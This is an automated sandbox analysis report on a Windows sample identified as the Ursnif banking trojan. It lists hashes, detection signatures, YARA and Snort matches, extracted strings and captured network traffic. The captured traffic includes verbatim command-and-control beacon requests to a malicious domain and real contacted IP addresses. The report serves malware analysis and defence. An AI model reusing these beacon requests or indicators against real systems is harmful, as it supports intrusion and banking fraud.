Windows Analysis Report cd.exe

Overview

General Information

Sample Name: cd.exe
Analysis ID: 483177
MD5: cd02e745a08dd29cb6fda1761b2f4b6e
SHA1: 1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
SHA256: a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
Tags: exe

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Found PSEXEC tool (often used for remote process execution)
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Yara detected PsExec sysinternal tool
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
PE file contains more sections than normal
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • cd.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\cd.exe' MD5: CD02E745A08DD29CB6FDA1761B2F4B6E)
  • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
cd.exe | JoeSecurity_PsExec | Yara detected PsExec sysinternal tool | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: cd.exe, ReversingLabs: Detection: 60%
Machine Learning detection for sample
Source: cd.exe, Joe Sandbox ML: detected
Source: 1.2.cd.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.3.cd.exe.82998c.0.unpack, Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\cd.exe, Unpacked PE file: 1.2.cd.exe.400000.0.unpack
Source: cd.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

Spreading:

Found PSEXEC tool (often used for remote process execution)
Source: cd.exe, String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49737 -> 173.239.8.164:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49737 -> 173.239.8.164:80
Source: Traffic, Snort IDS: 2030821 ET MALWARE Win32/Zonebac Traffic Redirect 192.168.2.6:49737 -> 173.239.8.164:80
Source: Joe Sandbox View, ASN Name: WEBAIR-INTERNETUS
Source: Joe Sandbox View, JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Yara match, File source: cd.exe, type: SAMPLE
Source: Joe Sandbox View, IP Address: 173.192.101.24
Source: unknown, HTTP traffic detected: POST / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: menehleibe.com Content-Length: 12 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65 Data Ascii: ic=0&fb=true
Source: unknown, DNS traffic detected: queries for: menehleibe.com
Source: global traffic, HTTP traffic detected: GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: gertrk.com
Source: global traffic, HTTP traffic detected: GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Referer: http://menehleibe.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: gertrk.com Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gertrk.com Connection: Keep-Alive Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
Source: global traffic, HTTP traffic detected: GET /?gws_rd=ssl HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: www.google.com
Source: global traffic, HTTP traffic detected: GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
Source: global traffic, HTTP traffic detected: GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
Source: global traffic, HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 Referer: https://www.google.com/?gws_rd=ssl Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: CONSENT=PENDING+509
Source: global traffic, HTTP traffic detected: GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: menehleibe.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: menehleibe.com Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com
              Source: unknown HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara match File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

              E-Banking Fraud:

              Yara detected Ursnif

              System Summary:

              Writes or reads registry keys via WMI
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMI
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\cd.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: cd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040323C
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040171A NtMapViewOfSection,RtlNtStatusToDosError,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040202A NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004022D1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004020E9 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,memcpy,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00402F98 memset,memcpy,NtSetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,GetCalendarWeekNumber,GetLastError,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00401646 NtGetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_00402550 NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,LdrInitializeThunk,LdrInitializeThunk,memcpy,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_0040345D NtQueryVirtualMemory,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004018E5 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004031F0 NtGetContextThread,
              Source: C:\Users\user\Desktop\cd.exe Code function: 1_2_004012A3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
              Source: cd.exe Binary or memory string: zD%s\service_log.txtERROR! %s %s : %s%s\StringFileInfo\040904b0\OriginalFilename\installpath_SkipServiceVerificationChecks%s\bin\service_minimum_versions.vdf%s\service_minimum_versions.vdfVersion file missing or corrupt: %s vs cd.exe
              Source: cd.exe Binary or memory string: M\VarFileInfo\Translation\D:\B\T\Imports\Open\Chrome\Chrome\src\base\file_version_info_win.ccCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls vs cd.exe
              Source: cd.exe Static PE information: Number of sections : 71 > 10
              Source: cd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: cd.exe ReversingLabs: Detection: 60%
              Source: C:\Users\user\Desktop\cd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown Process created: C:\Users\user\Desktop\cd.exe 'C:\Users\user\Desktop\cd.exe'
              Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
              Source: C:\Users\user\Desktop\cd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat
              Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP
              Source: cd.exe Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServer\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
              Source: cd.exeBinary string: NUnknownDefaultNtCreateFileNtOpenFileNtQueryAttributesFileNtQueryFullAttributesFileCreateNamedPipeWNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExCreateProcessWNtCreateKeyNtOpenKeyCreateThreadNtCreateSectioncompute-only-brokercompute-only-rendereripc-co-channelipc-rdr-channeltyperenderershell-broker-channelipc-cef-channellocaleservice-sandbox-typenonenone_and_elevatednetworkppapiutilitycdmprint_compositoraudiosharing_servicespeech_recognitionvideo_capturepdf_conversionproxy_resolverxr_compositingallow-no-sandbox-joballow-sandbox-debuggingdisable-gpu-sandboxdisable-namespace-sandboxdisable-seccomp-filter-sandboxdisable-setuid-sandboxdisable-win32k-lockdownenable-audio-service-sandboxgpu-sandbox-allow-sysv-shmgpu-sandbox-failures-fatalno-sandboxallow-third-party-modulesadd-gpu-appcontainer-capsno-sandbox-and-elevatedadd-xr-appcontainer-capsgpu-processnacl-brokernacl-loaderppapi-brokerppapiutilityservicezygotentdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\@
              Source: cd.exeBinary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ControlH1`@dI0nIPdI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage 2`@dI0nI 7Hp2`
              Source: cd.exeBinary string: GCreateEvent: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sync_dispatcher.ccOpenEvent: STATUS_ACCESS_DENIEDConsider modifying policy using these policy rules: EVENTS_ALLOW_ANY\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\IsWow64Process2SetDefaultDllDirectoriesSetProcessMitigationPolicy\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSetInformationProcesssecurity descriptor - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\target_process.ccCreateProcessAsUserW failed to create sandbox process - error:job object - error:set thread token - error:g_shared_sectiong_shared_IPC_sizeg_shared_policy_size\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]#B
              Source: cd.exeBinary string: >`\Device\FileInfo%s%s%c:Superfetchinfo: %x Data: %x
              Source: cd.exeBinary string: 3`@gI84`pfI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: cCZECSYGREELLSUOFINPOLPLKRUMROMTURTRKMNGMONESPESN\Locale\\brdlang32.Software\Adobe\Adobe Acrobat\DC\Language\current\brdlang32SYSTEM\CurrentControlSet\Control\FileSystemLongPathsEnabled\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\`
              Source: cd.exeBinary string: cnullbooleanintegerdoublestringbinarydictionarylist\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: :Zone.Identifierfeatmonitorapp.exeIPTip_Main_WindowSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32%CommonProgramFiles%CommonProgramW6432Software\Adobe\Adobe Acrobat\DC\AVGeneralbProtectedModebHasAcrobatConsentDCSoftware\Adobe\Acrobat Reader\DC\PrivilegedContinuous.lnk\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SeChangeNotifyPrivilegeS:(ML;;;;;)S-1-16-16384S-1-16-12288S-1-16-8192S-1-16-6144S-1-16-4096S-1-16-2048S-1-16-0NtCreateLowBoxToken\Sessions\%d\AppContainerNamedObjects\%lsNtCreateDirectoryObject\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]0
              Source: cd.exeBinary string: IDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too longatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistrar_pptExport.emfatlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceException.tmp.pdfatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPICount
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe 
Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
